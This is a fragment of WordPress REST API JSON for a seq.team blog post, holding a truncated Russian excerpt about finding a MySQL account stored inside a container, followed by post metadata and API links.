\u0445\u0440\u0430\u043d\u044f\u0449\u0438\u043c\u0441\u044f \u0432\u043d\u0443\u0442\u0440\u0438 \u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440\u0430 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043c \u0423\u0417 \u0421\u0423\u0411\u0414 MySQL. \u0412 […]<\/p>\n","protected":false},"author":5,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-602","post","type-post","status-publish","format-standard","hentry","category-blog"],"translation":{"provider":"WPGlobus","version":"3.0.0","language":"en","enabled_languages":["ru","en"],"languages":{"ru":{"title":true,"content":true,"excerpt":false},"en":{"title":false,"content":false,"excerpt":false}}},"_links":{"self":[{"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/posts\/602","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/comments?post=602"}],"version-history":[{"count":14,"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/posts\/602\/revisions"}],"predecessor-version":[{"id":625,"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/posts\/602\/revisions\/625"}],"wp:attachment":[{"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/media?parent=602"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/categories?post=602"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/seq.team\/en\/wp-json\/wp\/v2\/tags?post=602"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}